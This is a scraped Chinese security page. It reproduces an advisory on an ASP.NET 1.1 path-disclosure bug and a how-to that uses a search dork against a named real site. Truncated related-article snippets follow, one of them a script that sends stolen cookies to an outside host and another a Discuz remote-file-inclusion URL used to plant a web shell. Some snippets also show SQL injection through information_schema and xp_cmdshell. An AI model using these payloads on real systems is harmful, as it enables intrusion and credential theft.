NET IIS暴绝对路径漏洞_安全相关

Title:Microsoft ASP.NET May Disclose Web Directory to Remote Users in Certain Cases
Description: If the ASP.NET application does not filter the error message, the web 
directory information may be disclosed to remote users by using an unavailable file 
which start with "~".
Hi, I'm Soroush Dalili from GrayHatz Security Group(GSG).I found new thing in .NET 
Framework Version:1.1 (.ASPX Files).
If error mode in .net configuration is on, Run an unavailable aspx file that start with 
"~" can cause showing full path in browsers.
For Example: Http://[URL]/~foo.aspx
------------------------------------------------------------------------
Note:Version 2 have not this bug and it return file does not exist

Vendor URL: www.microsoft.com
Version:1.1
Soloution: Update to version 2 or enable error filtering
Finder: Soroush Dalili
Team: GSG [GrayHatz Security group]
Web: grayhatz.net
Country: Iran
Email: Irsdl[a.t]yahoo[d.o.t]com

搜索引擎 inurl:aspx,然后随便点个连接,在url后输入~fly_ocean.aspx,即可暴出绝对路径。

例如:
http://www.fodonline.com/qihuoju/default.aspx~fly_ocean.aspx
用于监视的文件名无效:“D:\aaa\qihuoju\default.aspx~fly_ocean.aspx”。用于监视的文件名必须具有绝对路径,并且不包含通配符。 
版本信息: Microsoft .NET Framework 版本:1.1.4322.2300; ASP.NET 版本:1.1.4322.2300

时间: 2024-09-21 07:02:55

NET IIS暴绝对路径漏洞_安全相关的相关文章

QCMS V2.0命令执行与暴绝对路径漏洞

QCMS是 一款小型的网站管理系统.拥有多种结构类型,包括:ASP+ACCESS.ASP+SQL.PHP+MYSQL.今天叫兄弟们一起挖掘QCMS的漏洞,与大家分享挖洞的全过程.498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 498px; height: 208px" border="0" alt="QCMS V2.0命令执行与暴绝对路径漏洞&q

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞_漏洞研究

漏洞发现:LiNZI[B.C.T]@www.cnbct.org  厂商名字:动网先锋论谈  厂商地址:http://www.dvbbs.net/  漏洞程序:Dvbbs 7.1.0  漏洞描述:  Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等.  漏洞利用例子:  一.泄露绝对漏洞测试:  对官方的测试站点:bbs.dvbbs.net  上传一张图,代码如下:  GIF89a  <script>alert(document.c

discuz许愿池插件远程包含漏洞_安全相关

许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号. 这里xxxx.txt用CN.Tink的那个小马写个shell进去: <?copy

mysql5 注入漏洞_安全相关

复制代码 代码如下: select concat_ws(0x2f,information_schema.tables.table_schema,`information_schema`.`COLUMNS`.table_name,`information_schema`.`COLUMNS`.column_name) from `information_schema`.`COLUMNS` left join information_schema.tables on `information_sche

关于动网的cookie泻露站点绝路径的问题_安全相关

一.跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565777847.jpg 图二则是偶的个人照 U

域名重定向-urlrewriter 本地可以 iis发布文件路径丢失

问题描述 urlrewriter 本地可以 iis发布文件路径丢失 本地f5直接运行调试一切正常,发布到本地iis配置完映射后可以访问,但是js css jpg 什么的链接全挂了(链接路径是正确的,不要怀疑!) 有碰到过这类问题的朋友吗?求助!

ASP漏洞全接触-高级篇_安全相关

   看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了.但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇. 第一节.利用系统表注入SQLServer数据库 SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ①http://Site/url.asp?id=1;exec master..xp_cmdshe

ASP漏洞全接触-入门篇_安全相关

   随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患.用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入. SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报

对错误,漏洞和exploits的说明_安全相关

作者:Mark Vogels  翻译:黯魂[S.S.T]  在这篇文档中,我将会试着为你提供一个对于错误,和由于那些错误而产生的漏洞以及它们的exploits的基本认识.那决不意味着能让你完全理解exploits和漏洞,但是能帮助你学会认识可能的漏洞以及怎样处理它们.  一般而言有3种不同类型的错误会可能危及计算机系统和网络的安全.  #编程错误  #配置错误  #设计错误  错误可以被看成是失误,尽管它们并非都是由事故导致的.软件/设备的最初创建者可能就存在错误,用最好的想法却创建了错误,并且